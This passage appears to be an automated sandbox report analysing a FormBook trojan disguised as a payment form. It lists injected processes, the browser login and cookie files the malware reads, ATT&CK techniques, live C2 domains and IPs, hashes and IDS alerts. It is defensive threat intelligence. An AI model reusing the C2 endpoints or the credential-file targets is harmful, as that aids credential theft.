            Source: QYzBgoBGBcxProZWs.exe, 00000005.00000002.3787758854.0000000001BD1000.00000002.00000001.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000005.00000000.1505305130.0000000001BD1000.00000002.00000001.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3787839821.0000000001891000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
            Source: QYzBgoBGBcxProZWs.exe, 00000005.00000002.3787758854.0000000001BD1000.00000002.00000001.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000005.00000000.1505305130.0000000001BD1000.00000002.00000001.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3787839821.0000000001891000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: QYzBgoBGBcxProZWs.exe, 00000005.00000002.3787758854.0000000001BD1000.00000002.00000001.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000005.00000000.1505305130.0000000001BD1000.00000002.00000001.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3787839821.0000000001891000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: QYzBgoBGBcxProZWs.exe, 00000005.00000002.3787758854.0000000001BD1000.00000002.00000001.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000005.00000000.1505305130.0000000001BD1000.00000002.00000001.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3787839821.0000000001891000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe Code function: 0_2_00007FF6E82B1554 cpuid
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe Code function: 0_2_00007FF6E82B11B0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter

            Stealing of Sensitive Information

            Source: Yara match, File source: 3.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 3.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.3791387211.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.3791432019.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.1580637311.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.3793025669.0000000005700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.1581046777.0000000005730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.3789791469.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match, File source: 3.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 3.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.3791387211.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.3791432019.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.1580637311.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.3793025669.0000000005700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.1581046777.0000000005730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.3789791469.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 3 Virtualization/Sandbox Evasion | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 612 Process Injection | 1 Access Token Manipulation | LSASS Memory | 121 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 612 Process Injection | Security Account Manager | 3 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Abuse Elevation Control Mechanism | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Software Packing | DCSync | 114 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            [Behavior graph. ID: 1475677; Sample: Payment Form+Inquiry LIST.exe; Startdate: 18/07/2024; Architecture: WINDOWS; Score: 100. Process chain: Payment Form+Inquiry LIST.exe started vbc.exe and conhost.exe; vbc.exe injected QYzBgoBGBcxProZWs.exe, which started findstr.exe; findstr.exe injected QYzBgoBGBcxProZWs.exe and started firefox.exe.]

            Source | Detection | Scanner | Label
            Payment Form+Inquiry LIST.exe | 56% | Virustotal |
            Payment Form+Inquiry LIST.exe | 58% | ReversingLabs | Win64.Trojan.Leonem
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label
            siteblogoficialon.com | 0% | Virustotal |
            www.csstoneoak.com | 1% | Virustotal |
            www.lavillitadepapa.com | 1% | Virustotal |
            www.instantmailer.cloud | 1% | Virustotal |
            mybodyradar.net | 11% | Virustotal |
            www.amkmos.online | 1% | Virustotal |
            www.kosherphonestore.com | 5% | Virustotal |
            www.valerieomage.com | 0% | Virustotal |
            www.gzlhysuess.com | 0% | Virustotal |
            www.mcxright.com | 1% | Virustotal |
            www.gospelstudygroup.org | 1% | Virustotal |
            www.siteblogoficialon.com | 0% | Virustotal |
            www.mybodyradar.net | 1% | Virustotal |
            shops.myshopify.com | 0% | Virustotal |
            www.cwgehkk.store | 0% | Virustotal |
            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.valerieomage.com/c7rq/?mZytyNB=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+swaARuNAxDjOzMu+VfqP1kNqiiXC0Ug==&54D0m=gvohHHH00%Avira URL Cloudsafe
            http://www.lavillitadepapa.com/i1fz/?mZytyNB=69+72+ftTFcgCPV1pfBGcRAhZJTRakO2Kh+ZkvubWnSJrIurKkpNo2aBygpvSICGeoPjDFn9pekXwSuquQeAgXbnoNXGqYnuCVvRNE6ZSnCvZlL6jw==&54D0m=gvohHHH0100%Avira URL Cloudmalware
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark0%Avira URL Cloudsafe
            http://www.mg55aa.xyz/7npk/0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js0%Avira URL Cloudsafe
            http://www.siteblogoficialon.com/xti2/0%Avira URL Cloudsafe
            https://valerieomage.com/c7rq?mZytyNB=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl0%Avira URL Cloudsafe
            https://www.lavillitadepapa.com/i1fz/?mZytyNB=69100%Avira URL Cloudmalware
            http://www.csstoneoak.com/gtrt/?54D0m=gvohHHH0&mZytyNB=CHU0G0yFQmM3m9FspjIn2OXZQ8PvFb3qq8K3IggeoLnhuD5d4WydmEsCdQRuIbszuu3RpEHjTi2Q+otudHtA+7uFI7xmMJNqmwR/uOZtT1hR+XqCuA==0%Avira URL Cloudsafe
            https://aka.ms/nativeaot-compatibilityy0%Avira URL Cloudsafe
            https://aka.ms/nativeaot-compatibility8d80%Avira URL Cloudsafe
            https://track.uc.cn/collect0%Avira URL Cloudsafe
            http://www.lacemalt.top/tb8p/0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.mybodyradar.net/nml2/100%Avira URL Cloudmalware
            https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js0%Avira URL Cloudsafe
            http://www.cwgehkk.store/kwl6/0%Avira URL Cloudsafe
            http://www.lacemalt.top/tb8p/?54D0m=gvohHHH0&mZytyNB=qOKUC29yX8oZAlbJDfcpCLzpMPZC9WFwxrZXgt1GanD4ODtcEeVG6I3ogONv/wZG3CcBcKt2BHXhpUQRSUiIsaScbSWFF5V9pamWb9U32+hQ7ii7xg==0%Avira URL Cloudsafe
            http://www.kosherphonestore.com/ktbm/?mZytyNB=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgXOWwK4/O35gX3K6ytzmMUh+twkmzSQ==&54D0m=gvohHHH00%Avira URL Cloudsafe
            https://hm.baidu.com/hm.js?0%Avira URL Cloudsafe
            https://aka.ms/nativeaot-compatibility0%Avira URL Cloudsafe
            https://www.etmt194.com/s1/yurjyyya0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js0%Avira URL Cloudsafe
            https://aka.ms/GlobalizationInvariantMode0%Avira URL Cloudsafe
            http://www.siteblogoficialon.com/xti2/?mZytyNB=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8+h4eo3ZkplyB9kY6zupybd5FXB5boaSfX9kd7InJ4l2pFGuXFTeP1snGKodOakbcCZ5ieg/dQ==&54D0m=gvohHHH00%Avira URL Cloudsafe
            http://www.lavillitadepapa.com/i1fz/100%Avira URL Cloudmalware
            https://www.kosherphonestore.com/ktbm/?mZytyNB=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixt0%Avira URL Cloudsafe
            http://www.cwgehkk.store/kwl6/?54D0m=gvohHHH0&mZytyNB=a60HvCvUhLiFhuUSc8WrKARCzXFsQAvffUZBz2uIU9nHYJX4NGLIPasF9EYqD4O1NmBy69LXG4mImYvzxGn1EucVb48mJLaeeXAyU/wxkvnKBCdexA==0%Avira URL Cloudsafe
            https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css0%Avira URL Cloudsafe
            http://www.csstoneoak.com/gtrt/0%Avira URL Cloudsafe
            https://www.siteblogoficialon.com/xti2/?mZytyNB=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC80%Avira URL Cloudsafe
            http://www.mg55aa.xyz/7npk/?54D0m=gvohHHH0&mZytyNB=3lhlChS8FYnXqyMl6DrMwk16pFUOD90SHj/DecBTIjGSaQxy34ZC87B+/wA+Ty9En/TQ2WIUU2NJwAlG0p0MY4r+pCVils+sXQjgc19rp6lijR1H1Q==0%Avira URL Cloudsafe
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  Name | Malicious | Antivirus Detection | Reputation
                    Name | Source | Malicious | Antivirus Detection | Reputation
                          IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                          Joe Sandbox version: 40.0.0 Tourmaline
                          Analysis ID: 1475677
                          Start date and time: 2024-07-18 08:14:21 +02:00
                          Joe Sandbox product: CloudBasic
                          Overall analysis duration: 0h 10m 9s
                          Hypervisor based Inspection enabled: false
                          Report type: full
                          Cookbook file name: default.jbs
                          Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed: 12
                          Number of new started drivers analysed: 0
                          Number of existing processes analysed: 0
                          Number of existing drivers analysed: 0
                          Number of injected processes analysed: 2
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode: default
                          Analysis stop reason: Timeout
                          Sample name: Payment Form+Inquiry LIST.exe
                          Detection: MAL
                          Classification: mal100.troj.spyw.evad.winEXE@8/1@14/9
                          EGA Information:
                          • Successful, ratio: 75%
                          HCA Information:
                          • Successful, ratio: 67%
                          • Number of executed functions: 75
                          • Number of non-executed functions: 300
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes were analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          Time | Type | Description
                          02:16:13 | API Interceptor | 10330704x Sleep call for process: findstr.exe modified
                          Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                          No context
                          No context
                          Process:C:\Windows\SysWOW64\findstr.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                          Category:dropped
                          Size (bytes):196608
                          Entropy (8bit):1.1221538113908904
                          Encrypted:false
                          SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                          MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                          SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                          SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                          SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          File type:PE32+ executable (console) x86-64, for MS Windows
                          Entropy (8bit):7.042770064714997
                          TrID:
                          • Win64 Executable Console Net Framework (206006/5) 48.58%
                          • Win64 Executable Console (202006/5) 47.64%
                          • Win64 Executable (generic) (12005/4) 2.83%
                          • Generic Win/DOS Executable (2004/3) 0.47%
                          • DOS Executable Generic (2002/1) 0.47%
                          File name:Payment Form+Inquiry LIST.exe
                          File size:1'950'720 bytes
                          MD5:7f8d840982ad0a6c999a3a35e2bff6c1
                          SHA1:aec4c33c4513d9b7d1a9d01ed5234a060e4a6481
                          SHA256:b7ca9f28528677ff0664ea5968a23f19c454b72c54dcaeca4cc1c3173e6f80bc
                          SHA512:58cd6e8ee762c058abca77dccc3b4dbf8bf994e6598da440bbfc958d12622b2517deb8e31b233d1acee34195aa2c2db20fd50c27777d5feaede10c1e5423bcd8
                          SSDEEP:49152:K01xRoq0SqdSo1s9Z7N/pilLbWQ87oFfXUiUbL1tPGQgvvKceg:0nd9USKcp
                          TLSH:B995BE15E3E802A8E577DB34CA629333CAB1B8561731E58F065CD2452F33EA19B7B315
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.x...+...+...+b..*...+b..*...+b..*...+.b.+...+.b.*...+...+R..+R..*...+R..*...+...+...+R..*...+...*...+...*...+Rich...+.......
                          Icon Hash:00928e8e8686b000
                          Entrypoint:0x140060b80
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x140000000
                          Subsystem:windows cui
                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Time Stamp:0x667341EA [Wed Jun 19 20:39:06 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:6
                          OS Version Minor:0
                          File Version Major:6
                          File Version Minor:0
                          Subsystem Version Major:6
                          Subsystem Version Minor:0
                          Import Hash:06249f041b2cdab25d6c331a97469bef
                          Programming Language:
                          • [IMP] VS2008 SP1 build 30729
                          Name | Virtual Address | Virtual Size | Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x1c6d00 | 0x34 | .rdata
                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1c6d34 | 0xf0 | .rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1e8000 | 0x42f2c | .rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x1d7000 | 0x107c4 | .pdata
                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x22b000 | 0x574 | .reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1a4fb0 | 0x1c | .rdata
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_TLS | 0x1a5180 | 0x28 | .rdata
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1a4e70 | 0x140 | .rdata
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IAT | 0x159000 | 0x738 | .rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                          .text | 0x1000 | 0x655e8 | 0x65600 | 06d93d7c40e01c1300f6826c879558b6 | False | 0.4591360974106042 | data | 6.658242031189929 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .managed | 0x67000 | 0xb1ba8 | 0xb1c00 | f2ee50ef03eb60f92e5431d11901f336 | False | 0.4627670094936709 | data | 6.453982445298983 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          hydrated | 0x119000 | 0x3f0c8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rdata | 0x159000 | 0x6f78a | 0x6f800 | 55350dd21c6c3ce1a99f3242d5dead9f | False | 0.4843531039798206 | data | 6.511308033767351 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data | 0x1c9000 | 0xd448 | 0x1800 | b73d85394fcbb4f8e302620aa18de2a0 | False | 0.205078125 | data | 2.9410741871914508 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .pdata | 0x1d7000 | 0x107c4 | 0x10800 | d4aa8ab84ce58ce8b0368a1da3459918 | False | 0.4968039772727273 | data | 6.140879273828546 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .rsrc | 0x1e8000 | 0x42f2c | 0x43000 | 391c798eca5d145cc6ce69cf928cfc06 | False | 0.996767869636194 | data | 7.998334767119872 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc | 0x22b000 | 0x574 | 0x600 | 0bd5f65d59a22905486c6cac1480bcf3 | False | 0.5944010416666666 | data | 5.180551038470706 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                          BINARY | 0x1e8130 | 0x42884 | data | | | 1.0003339253475025
                          RT_VERSION | 0x22a9b4 | 0x38c | PGP symmetric key encrypted data - Plaintext or unencrypted data | | | 0.3634361233480176
                          RT_MANIFEST | 0x22ad40 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                          DLL | Import
                          ADVAPI32.dll | AdjustTokenPrivileges, CreateWellKnownSid, DeregisterEventSource, DuplicateTokenEx, GetSecurityDescriptorLength, GetTokenInformation, GetWindowsAccountDomainSid, LookupPrivilegeValueW, OpenProcessToken, OpenThreadToken, RegCloseKey, RegCreateKeyExW, RegDeleteKeyExW, RegDeleteTreeW, RegDeleteValueW, RegEnumKeyExW, RegEnumValueW, RegFlushKey, RegOpenKeyExW, RegQueryInfoKeyW, RegQueryValueExW, RegSetValueExA, RegSetValueExW, RegisterEventSourceW, ReportEventW, RevertToSelf, SetThreadToken
                          bcrypt.dll | BCryptCloseAlgorithmProvider, BCryptDecrypt, BCryptDestroyKey, BCryptGenRandom, BCryptGenerateSymmetricKey, BCryptOpenAlgorithmProvider
                          KERNEL32.dll | TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, EncodePointer, RaiseException, AllocConsole, CancelThreadpoolIo, CloseHandle, CloseThreadpoolIo, CopyFileExW, CreateDirectoryW, CreateEventExW, CreateFileW, CreateProcessA, CreateSymbolicLinkW, CreateThreadpoolIo, DeleteCriticalSection, DeleteFileW, DeleteVolumeMountPointW, DeviceIoControl, DuplicateHandle, EnterCriticalSection, ExitProcess, ExpandEnvironmentStringsW, FileTimeToSystemTime, FindClose, FindFirstFileExW, FindNextFileW, FormatMessageW, FreeConsole, FreeLibrary, GetCPInfo, GetConsoleOutputCP, GetConsoleWindow, GetCurrentProcess, GetCurrentProcessId, GetCurrentProcessorNumberEx, GetCurrentThread, GetDynamicTimeZoneInformation, GetEnvironmentVariableW, GetFileAttributesExW, GetFileInformationByHandle, GetFileInformationByHandleEx, GetFileType, GetFinalPathNameByHandleW, GetFullPathNameW, GetLastError, GetLogicalDrives, GetLongPathNameW, GetModuleFileNameW, GetModuleHandleA, GetOverlappedResult, GetProcAddress, GetStdHandle, GetSystemTime, GetThreadPriority, GetTickCount64, GetTimeZoneInformation, GetVolumeInformationW, InitializeConditionVariable, InitializeCriticalSection, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryExW, LocalAlloc, LocalFree, MoveFileExW, MultiByteToWideChar, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseFailFastException, ReadFile, RemoveDirectoryW, ReplaceFileW, ResetEvent, ResumeThread, SetEvent, SetFileAttributesW, SetFileInformationByHandle, SetLastError, SetThreadErrorMode, SetThreadPriority, Sleep, SleepConditionVariableCS, StartThreadpoolIo, SystemTimeToFileTime, TzSpecificLocalTimeToSystemTime, VirtualAlloc, VirtualFree, WaitForMultipleObjectsEx, WakeConditionVariable, WideCharToMultiByte, WriteFile, FlushProcessWriteBuffers, WaitForSingleObjectEx, RtlVirtualUnwind, RtlCaptureContext, RtlRestoreContext, VerSetConditionMask, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, SwitchToThread, CreateThread, GetCurrentThreadId, SuspendThread, GetThreadContext, SetThreadContext, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, VerifyVersionInfoW, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, VirtualQuery, GetSystemTimeAsFileTime, InitializeCriticalSectionEx, DebugBreak, WaitForSingleObject, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, RtlPcToFileHeader, RtlUnwindEx, InitializeSListHead, IsProcessorFeaturePresent, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlLookupFunctionEntry
                          ole32.dll | CoInitializeEx, CoUninitialize, CoCreateGuid, CoTaskMemAlloc, CoGetApartmentType, CoTaskMemFree, CoWaitForMultipleHandles
                          api-ms-win-crt-math-l1-1-0.dll | ceil, modf, __setusermatherr
                          api-ms-win-crt-heap-l1-1-0.dll | _set_new_mode, free, _callnewh, calloc, malloc
                          api-ms-win-crt-string-l1-1-0.dll | strcmp, _stricmp, wcsncmp, strcpy_s
                          api-ms-win-crt-convert-l1-1-0.dll | strtoull
                          api-ms-win-crt-runtime-l1-1-0.dll | _crt_atexit, _register_onexit_function, _initialize_onexit_table, abort, terminate, _register_thread_local_exe_atexit_callback, _c_exit, _seh_filter_exe, _set_app_type, _configure_wide_argv, _initialize_wide_environment, _get_initial_wide_environment, __p___wargv, _initterm_e, exit, _exit, _cexit, __p___argc, _initterm
                          api-ms-win-crt-stdio-l1-1-0.dll | _set_fmode, __p__commode
                          api-ms-win-crt-locale-l1-1-0.dll | _configthreadlocale
                          Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                          07/18/24-08:16:35.708258 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49716 | 80 | 192.168.2.9 | 43.155.26.241
                          07/18/24-08:15:55.343618 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49709 | 80 | 192.168.2.9 | 23.227.38.74
                          07/18/24-08:18:13.794575 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49730 | 80 | 192.168.2.9 | 108.179.193.98
                          07/18/24-08:18:08.711636 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49728 | 80 | 192.168.2.9 | 108.179.193.98
                          07/18/24-08:18:38.635194 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49732 | 80 | 192.168.2.9 | 35.241.34.216
                          07/18/24-08:16:22.150762 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49712 | 80 | 192.168.2.9 | 84.32.84.101
